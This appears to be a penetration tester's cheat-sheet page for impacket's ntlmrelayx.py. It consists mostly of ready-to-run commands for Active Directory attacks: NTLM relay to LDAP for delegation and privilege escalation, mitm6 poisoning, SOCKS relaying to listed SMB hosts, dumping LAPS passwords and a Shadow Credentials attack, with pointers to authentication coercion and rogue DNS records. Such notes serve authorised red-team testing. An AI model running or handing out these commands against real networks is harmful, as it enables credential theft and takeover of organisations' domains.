ntlmrelayx.py
ntlmrelay is part of impacket.
Escalate privileges via relay
If you've already added a computer record to the environment (using something like powermad), you may be able relay to LDAP and assign escalated privileges to that computer object! For example:
ntlmrelayx.py -t ldap://ip.of.domain.controller --delegate-access -smb2support --escalate-user COMPUTER-OBJECT-YOU-CONTROL$
Then, if you've found a system running WebClient, you could potentially coerce authentication to a DNS record you've added and pull off the privesc!
Delegate access attack while poisoning with mitm6
ntlmrelayx.py -6 -wh doesntexist -t ldaps://ip.of.a.domain-controller --delegate-access
Setup SOCKS relay to a list of hosts
In this example we have a targets.txt
file full of entries like this:
smb://1.2.3.4
smb://1.2.3.5
smb://1.2.3.6
We setup the SOCKS relay like so:
ntlmrelayx.py -tf targets.txt -smb2support -socks
Dumping LAPS passwords
If you want to just setup a relay to dump the LAPS passwords (if you're lucky enough to relay a DA cred), you can skip the dumping of domain info and/or adding a DA account and just specify you want to dump LAPS passwords:
ntlmrelayx.py -6 -wh doesntexist -t ldap://ip.of.a.domain-controller --no-da --no-dump --dump-laps
Shadow Credentials attack
My favorite write-up on this attack is probably this one from GuidePoint security
Find hosts with WebClient running
The webclientservicescanner works well for this.
Add a rogue DNS record pointing to your machine
Try dnstool.py for this.
Setup relay for the Shadow Credentials attack
ntlmrelayx.py -t ldap://ip.of.a.dc --shadow-credentials --shadow-target 'VICTIM$' --no-validate-privs --no-dump --no-da
Trigger HTTP auth from VICTIMS
Head to our coercer page for more info.